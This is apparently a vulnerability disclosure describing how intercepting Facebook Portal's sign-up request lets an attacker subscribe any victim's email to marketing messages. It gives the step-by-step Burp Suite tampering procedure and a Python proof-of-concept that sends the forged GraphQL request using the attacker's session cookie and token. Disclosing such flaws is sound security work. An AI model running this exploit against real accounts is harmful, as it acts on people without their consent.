attacker Go to "https://portal.facebook.com/"

add Any Product to cart from Portal site

Attacker click in Sign-Up

The confirmation message will appear

""By submitting this form, you agree to receive marketing related electronic communications from Facebook about Portal and other Facebook hardware products, including news, events, updates, and promotional emails. You may withdraw your consent and unsubscribe from these at any time, for example, by clicking the unsubscribe link included in our emails. For more information about how Facebook handles your data please read our Facebook Data Policy. ""

Before pressing "Submit", the attacker intercepts POST Requests using "burp suite"

Now attacker click "Submit" and changes the value of  "email":"[email protected]" to the target account "email":"[email protected]"

6.Now when you go to https://portal.facebook.com/account/, The victim will see that the following options have been activated without his permission:

A. Product Updates
B. Promotions
C. Email Address Subscribed

I wrote the following python code to exploit this bug "Show Image"

import requests
import json
from requests_toolbelt.utils import dump
email = input("Enter Target E-mail : ") #Eg #[email protected]
Attacker_ID= input("Enter Hacker FB_ID : ") #Eg #__user=100035253094115
fbdtsg = input("Enter Hacker fb_dtsg ID : ") #Eg #fb_dtsg=AQFXXXXSXxXX:AQXXXXXXXXT3
XS_Cookie= input("Enter Hacker Xs_Cookie: ") #Eg #XS=34:RXX_XXXXXXX:2:1548273377:1503:671

url= 'https://portal.facebook.com/api/graphql/'
head = {"Cookie":"c_user="+Attacker_ID+"; xs="+XS_Cookie+";"}

postfields = {
'av':''+Attacker_ID+'',
'__user':''+Attacker_ID+'',
'fb_dtsg':''+fbdtsg+'',
'variables':'{"input":{"client_mutation_id":"1","actor_id":"'+Attacker_ID+'","email":"'+email+'","contact_preferences":[]}}',
'doc_id': '1614905525280647'
}

headers = {}
r = requests.post(url, data=postfields, headers=head)
data = dump.dump_all(r)
print(data.decode('utf-8'))
r.json()